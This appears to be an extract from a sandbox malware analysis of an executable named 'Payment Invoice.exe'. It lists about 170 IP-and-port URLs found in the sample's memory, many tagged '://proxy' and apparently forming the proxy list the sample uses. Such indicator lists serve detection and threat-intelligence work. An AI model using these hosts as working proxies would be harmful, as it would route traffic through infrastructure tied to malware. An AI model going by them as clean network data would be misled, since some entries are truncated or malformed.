                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.235.10.53:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.64.152.98
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.64.152.98://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.64.152.98:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.64.207.185:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631959C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.64.86.217
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319C9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.64.86.217://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.64.86.217:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.105.234
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.105.234://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319871000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.105.234:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.127.188
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.127.188://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.127.188:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.14.237
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.14.237://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.14.237:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631724B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.150.173
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.150.173://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.150.173:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.11
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.11://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.11:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.12
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.129
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.129://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.129:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.12://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.12:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.144://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.147
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.147://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.147:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.17
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.17://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.17:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.197
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.197://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.197:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.20
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.20://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.20:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.32
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.32://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.32:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.51:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.89
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.89://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319A43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.89:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.97
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.97://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.97:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316ABD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.0
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.0://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.0:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.107
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.107://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.107:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.126
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.126://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.126:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.165
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.165://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.165:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.169
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.169://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.169:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.22
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.22://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.22:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.38
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.38://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.38:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.48
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.48://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.48:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.77
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.77://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.77:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.96
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.96://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.182.96:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.185.199:13335
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.185.199:13335://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.187.242
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.187.242://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.187.242:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.200.220
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.200.220://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.200.220:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.206.105:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.209.12
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.209.12://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.209.12:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318314000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.219.60
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163182A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.219.60://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163182A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.219.60:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.231.3
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.231.3://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.231.3:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.25.204
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.25.204://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.25.204:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.254.127
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316823000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.254.127://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316823000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.254.127:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.3.1088
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318314000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.3.108://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318314000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.3.108:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.3.98
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.3.98://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.3.98:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.36.21
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.36.21://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.36.21:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.38.96
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.38.96://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.38.96:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.53.215
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.53.215://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.53.215:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316A85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.69.9
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.69.9://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.69.9:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.93.111.235:25485
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.93.111.235:25485://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.93.111.235:44374
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.93.111.235:44374://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.93.111.235:62543
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.93.111.235:62543://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.93.111.87:15805
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.93.111.87:15805://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.93.213.1778
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.93.213.177://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.93.213.177:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.209
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.209.216:27138
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.209.216:27138://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.209.49:31673
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.209.49:31673://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317A20000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631838E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.209.49:39522
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163179E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.209.49:39522://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.209.49:64309
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.209.49:64309://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317397000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316DCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:63614
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316DCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:63614://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.250.16:64768
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.250.16:64768://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316DC2000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316E1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.224.20.136:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316DCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.224.20.136:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.245.49.27
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.245.49.27://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.245.49.27:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.29.243:9123
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.29.243:9123://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.33.122:64873
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.33.122:64873://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.44.141.179:2001
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.44.141.179:2001://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317260000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.100.109.131:10019
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.100.109.131:10019://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.126.217.110
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.126.217.110://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.126.217.110:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.136.57.169:30453
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.136.57.169:30453://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.138.114.226
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.138.114.226://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.138.114.226:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.138.94.117
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.138.94.117://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.138.94.117:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.64.199.79:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.64.199.79:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.64.199.82:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.64.199.82:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.75.211.222:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316961000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.75.211.222:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.77.111.197:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.77.111.197:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.77.111.198:49547
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.77.111.198:49547://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.183.82.221:8193
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.183.82.221:8193://proxy
